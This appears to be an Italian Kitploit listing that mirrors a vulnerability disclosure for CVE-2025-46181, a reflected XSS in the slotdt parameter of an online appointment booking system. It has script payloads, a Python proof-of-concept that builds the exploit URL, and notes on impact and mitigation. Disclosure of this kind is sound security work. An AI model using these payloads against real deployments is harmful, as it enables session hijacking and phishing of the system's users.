Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-46181-XSS — Divulgazione di vulnerabilità XSS riflessa con script PoC e linee guida per la remediation per un sistema di prenotazione di appuntamenti online. Include analisi dei parametri vulnerabili e valutazione dell'impatto. | Kitploit
Strumenti/GitHubGitHub/shemkumar/cve-2025-46181-xss
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingApprendimento e Formazione
GitHubshemkumar/cve-2025-46181-xss

CVE-2025-46181-XSS

Divulgazione di vulnerabilità XSS riflessa con script PoC e linee guida per la remediation per un sistema di prenotazione di appuntamenti online. Include analisi dei parametri vulnerabili e valutazione dell'impatto.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
1 anno faNon ancora revisionato

CVE-2025-46181 - XSS Riflesso in un Sistema di Prenotazione Appuntamenti Online

CVE-ID: CVE-2025-46181
Scoperto da: Shemkumar P (shemkumar.github.io)
Tipo di Vulnerabilità: Cross-Site Scripting Riflesso (XSS)
Gravità: Media
Stato: Divulgato, CVE Assegnato da MITRE


✨ Descrizione

Esiste una vulnerabilità di Cross-Site Scripting Riflesso (XSS) in un sistema pubblico di prenotazione appuntamenti online (v1.0), in particolare nella pagina che gestisce la conferma dell'appuntamento. Un parametro GET non riesce a sanificare correttamente l'input, consentendo l'iniezione di JavaScript e l'esecuzione di codice nel browser della vittima.


📍 Parametro Vulnerabile

root@kitploit:~
GET /confirmapp.php?slotdt=<payload>

Esempio di Payload (Codificato):

root@kitploit:~
<script>alert("XSS")</script>

💥 Proof of Concept (PoC)

root@kitploit:~
<script>alert("You have been hijacked")</script>

🚫 Link live oscurato per motivi etici. Questa vulnerabilità è stata testata in un ambiente controllato.


⚙️ Script Python PoC

root@kitploit:~
import requests
from urllib.parse import quote

base_url = "https://[REDACTED]/confirmapp.php"
payload = '<script>alert("XSS triggered")</script>'

params = {
    'fullname': 'test',
    'mobile': '9999999999',
    'emailid': '[email protected]',
    'slotdt': payload,
    'slottime': '11:00:00',
    'doctorid': '2'
}

encoded = '&'.join(f"{k}={quote(str(v))}" for k, v in params.items())
print("Test URL (use only in authorized test environments):")
print(f"{base_url}?{encoded}")

🛡️ Impatto

  • Esecuzione arbitraria di JavaScript
  • Potenziale dirottamento della sessione
  • Reindirizzamento clickjacking o phishing
  • Attacchi mirati tramite link manipolati

🧪 Mitigazione

L'applicazione dovrebbe:

  • Escape degli input utente utilizzando htmlspecialchars() in PHP
  • Utilizzare una Content Security Policy (CSP)
  • Sanificare i dati utente sia lato client che server

📜 Cronologia

  • Scoperta: Maggio 2025
  • CVE Assegnato da MITRE: Giugno 2025
  • Rilascio Pubblico: Giugno 2025

🧑‍💻 Autore

Shemkumar P
🕸️ shemkumar.github.io
🔐 Ricercatore di Sicurezza Informatica | Appassionato di CTF | Reporter di CVE


⚠️ Questa pubblicazione è solo per uso educativo e difensivo. Testare o sfruttare vulnerabilità su sistemi di cui non si possiede o non si ha il permesso esplicito è illegale e non etico.

Scarica lo strumento